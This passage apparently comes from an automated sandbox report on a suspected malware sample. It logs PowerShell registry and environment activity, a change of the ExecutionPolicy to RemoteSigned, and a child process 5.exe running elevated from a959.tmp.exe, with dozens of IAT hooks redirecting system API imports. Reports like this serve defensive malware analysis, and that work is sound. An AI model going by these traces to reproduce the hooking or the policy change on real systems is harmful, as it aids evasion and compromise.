Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell - False 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = ExecutionPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = ExecutionPolicy, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = ExecutionPolicy, data = RemoteSigned, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = ExecutionPolicy, data = RemoteSigned, size = 26, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (11)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 10
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Environment (80)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 74
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #11: 5.exe
748 1
»
Information Value
ID #11
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:49, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x354
Parent PID 0x714 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 6E4
0x 80C
0x 810
0x 814
0x 818
0x 81C
0x 820
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
5.exe 0x00400000 0x0045DFFF Relevant Image - 32-bit - False False
buffer 0x00567AA8 0x0057D22B Marked Executable - 32-bit - False False
buffer 0x00567AA8 0x0057D22B Content Changed - 32-bit 0x005683D3, 0x00567AA8 False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000540000:+0x28785 1. entry of 5.exe 4 bytes advapi32.dll:StartServiceW+0x0 now points to private_0x000000007fff0000:+0x7ffe94b5
IAT private_0x0000000000540000:+0x28785 2. entry of 5.exe 4 bytes advapi32.dll:RegGetKeySecurity+0x0 now points to private_0x000000007fff0000:+0x18868dff
IAT private_0x0000000000540000:+0x28785 3. entry of 5.exe 4 bytes advapi32.dll:RegRestoreKeyA+0x0 now points to private_0x000000007fff0000:+0x3b00fffd
IAT private_0x0000000000540000:+0x28785 5. entry of 5.exe 4 bytes advapi32.dll:RegConnectRegistryW+0x0 now points to private_0x000000007fff0000:+0x7eef07e8
IAT private_0x0000000000540000:+0x28785 7. entry of 5.exe 4 bytes kernel32.dll:GetStringTypeExW+0x0 now points to private_0x000000007fff0000:+0xe00fffd
IAT private_0x0000000000540000:+0x28785 8. entry of 5.exe 4 bytes kernel32.dll:GetFileAttributesA+0x0 now points to private_0x000000007fff0000:+0x7ffe9c85
IAT private_0x0000000000540000:+0x28785 9. entry of 5.exe 4 bytes kernel32.dll:GetConsoleAliasW+0x0 now points to private_0x000000007fff0000:+0x6757e8ff
IAT private_0x0000000000540000:+0x28785 10. entry of 5.exe 4 bytes kernel32.dll:GetConsoleFontSize+0x0 now points to private_0x000000007fff0000:+0x58cfffe
IAT private_0x0000000000540000:+0x28785 11. entry of 5.exe 4 bytes kernel32.dll:GetStartupInfoW+0x0 now points to private_0x000000007fff0000:+0x8000fd9c
IAT private_0x0000000000540000:+0x28785 12. entry of 5.exe 4 bytes kernel32.dll:GlobalUnfix+0x0 now points to private_0x000000007fff0000:+0x7876ff50
IAT private_0x0000000000540000:+0x28785 14. entry of 5.exe 4 bytes kernel32.dll:FindVolumeMountPointClose+0x0 now points to private_0x000000007fff0000:+0xc868d00
IAT private_0x0000000000540000:+0x28785 15. entry of 5.exe 4 bytes kernel32.dll:GetLongPathNameA+0x0 now points to private_0x000000007fff0000:+0xe00fffd
IAT private_0x0000000000540000:+0x28785 17. entry of 5.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x68010001
IAT private_0x0000000000540000:+0x28785 18. entry of 5.exe 4 bytes kernel32.dll:VirtualLock+0x0 now points to private_0x000000007fff0000:+0x7fffecc8
IAT private_0x0000000000540000:+0x28785 19. entry of 5.exe 4 bytes kernel32.dll:MapUserPhysicalPagesScatter+0x0 now points to private_0x000000007fff0000:+0x7d8db5ff
IAT private_0x0000000000540000:+0x28785 20. entry of 5.exe 4 bytes kernel32.dll:GetSystemInfo+0x0 now points to private_0x000000007fff0000:+0x58effff
IAT private_0x0000000000540000:+0x28785 21. entry of 5.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x8000fd90
IAT private_0x0000000000540000:+0x28785 23. entry of 5.exe 4 bytes kernel32.dll:VirtualProtect+0x0 now points to private_0x000000007fff0000:+0x6dbfe800
IAT private_0x0000000000540000:+0x28785 24. entry of 5.exe 4 bytes kernel32.dll:CreateToolhelp32Snapshot+0x0 now points to private_0x000000007fff0000:+0x58cfffe
IAT private_0x0000000000540000:+0x28785 25. entry of 5.exe 4 bytes kernel32.dll:GetFileAttributesExW+0x0 now points to private_0x000000007fff0000:+0x8000fd90
IAT private_0x0000000000540000:+0x28785 26. entry of 5.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xd47e85a
IAT private_0x0000000000540000:+0x28785 28. entry of 5.exe 4 bytes kernel32.dll:OpenFileMappingA+0x0 now points to private_0x000000007fff0000:+0x5100078b
IAT private_0x0000000000540000:+0x28785 29. entry of 5.exe 4 bytes kernel32.dll:CompareStringW+0x0 now points to private_0x000000007fff0000:+0x510c085
IAT private_0x0000000000540000:+0x28785 30. entry of 5.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x8000ff6c
IAT private_0x0000000000540000:+0x28785 31. entry of 5.exe 4 bytes kernel32.dll:CreateFileA+0x0 now points to private_0x000000007fff0000:+0x362da153
IAT private_0x0000000000540000:+0x28785 32. entry of 5.exe 4 bytes kernel32.dll:GlobalAlloc+0x0 now points to pagefile_0x00000000007d0000:+0xe0041
IAT private_0x0000000000540000:+0x28785 33. entry of 5.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0xd57d0ff
IAT private_0x0000000000540000:+0x28785 34. entry of 5.exe 4 bytes kernel32.dll:GetLocaleInfoA+0x0 now points to private_0x000000007fff0000:+0x7ffe8885
IAT private_0x0000000000540000:+0x28785 37. entry of 5.exe 4 bytes kernel32.dll:GetNativeSystemInfo+0x0 now points to private_0x000000007fff0000:+0x6d23e8f8
IAT private_0x0000000000540000:+0x28785 38. entry of 5.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x58cfffe
IAT private_0x0000000000540000:+0x28785 39. entry of 5.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x8000fd88
IAT private_0x0000000000540000:+0x28785 40. entry of 5.exe 4 bytes kernel32.dll:GetCommandLineA+0x0 now points to private_0x000000007fff0000:+0x7eed9be8
IAT private_0x0000000000540000:+0x28785 41. entry of 5.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x50a250ff
IAT private_0x0000000000540000:+0x28785 42. entry of 5.exe 4 bytes kernel32.dll:HeapCreate+0x0 now points to private_0x000000007fff0000:+0xb0141b5
IAT private_0x0000000000540000:+0x28785 43. entry of 5.exe 4 bytes kernel32.dll:HeapDestroy+0x0 now points to private_0x000000007fff0000:+0xbd1ff00
IAT private_0x0000000000540000:+0x28785 44. entry of 5.exe 4 bytes kernel32.dll:VirtualFree+0x0 now points to private_0x000000007fff0000:+0x7c76ffd8
IAT private_0x0000000000540000:+0x28785 47. entry of 5.exe 4 bytes kernel32.dll:FatalAppExitA+0x0 now points to private_0x000000007fff0000:+0xe00fffd
IAT private_0x0000000000540000:+0x28785 49. entry of 5.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x68010001
IAT private_0x0000000000540000:+0x28785 50. entry of 5.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0x7fffec48
IAT private_0x0000000000540000:+0x28785 51. entry of 5.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7d7db5ff
IAT private_0x0000000000540000:+0x28785 52. entry of 5.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x58effff
IAT private_0x0000000000540000:+0x28785 53. entry of 5.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0x8000fd80
IAT private_0x0000000000540000:+0x28785 55. entry of 5.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x6d3fe800
IAT private_0x0000000000540000:+0x28785 56. entry of 5.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x158cfffe
IAT private_0x0000000000540000:+0x28785 57. entry of 5.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x8000fd80
IAT private_0x0000000000540000:+0x28785 58. entry of 5.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x7d85858d
IAT private_0x0000000000540000:+0x28785 59. entry of 5.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0xde9ffff
IAT private_0x0000000000540000:+0x28785 60. entry of 5.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0xc00fee6
IAT private_0x0000000000540000:+0x28785 61. entry of 5.exe 4 bytes kernel32.dll:GetCurrentThread+0x0 now points to private_0x000000007fff0000:+0x7ffe8485
IAT private_0x0000000000540000:+0x28785 64. entry of 5.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x58e0041
IAT private_0x0000000000540000:+0x28785 65. entry of 5.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x8000fd74
IAT private_0x0000000000540000:+0x28785 66. entry of 5.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x392d568d
IAT private_0x0000000000540000:+0x28785 68. entry of 5.exe 4 bytes kernel32.dll:SetFilePointer+0x0 now points to private_0x000000007fff0000:+0x7eecffe8
IAT private_0x0000000000540000:+0x28785 70. entry of 5.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0xe00fffd
IAT private_0x0000000000540000:+0x28785 71. entry of 5.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x7ffe7885
IAT private_0x0000000000540000:+0x28785 73. entry of 5.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x75e90000
IAT private_0x0000000000540000:+0x28785 74. entry of 5.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0xc00feec
IAT private_0x0000000000540000:+0x28785 75. entry of 5.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x7ffe7885
IAT private_0x0000000000540000:+0x28785 78. entry of 5.exe 4 bytes kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7f088b53
IAT private_0x0000000000540000:+0x28785 80. entry of 5.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x80006c85
IAT private_0x0000000000540000:+0x28785 82. entry of 5.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0xb0141b6
IAT private_0x0000000000540000:+0x28785 86. entry of 5.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to 5.exe:+0x151b3
IAT private_0x0000000000540000:+0x28785 87. entry of 5.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7d75858d
IAT private_0x0000000000540000:+0x28785 89. entry of 5.exe 4 bytes kernel32.dll:SetConsoleCtrlHandler+0x0 now points to private_0x000000007fff0000:+0x68010000
IAT private_0x0000000000540000:+0x28785 90. entry of 5.exe 4 bytes kernel32.dll:FreeLibrary+0x0 now points to private_0x000000007fff0000:+0x7fffea30
IAT private_0x0000000000540000:+0x28785 91. entry of 5.exe 4 bytes kernel32.dll:InterlockedExchange+0x0 now points to private_0x000000007fff0000:+0x7d85858d
IAT private_0x0000000000540000:+0x28785 93. entry of 5.exe 4 bytes kernel32.dll:GetTimeFormatA+0x0 now points to private_0x000000007fff0000:+0xe00fee3
IAT private_0x0000000000540000:+0x28785 94. entry of 5.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x7ffe8885
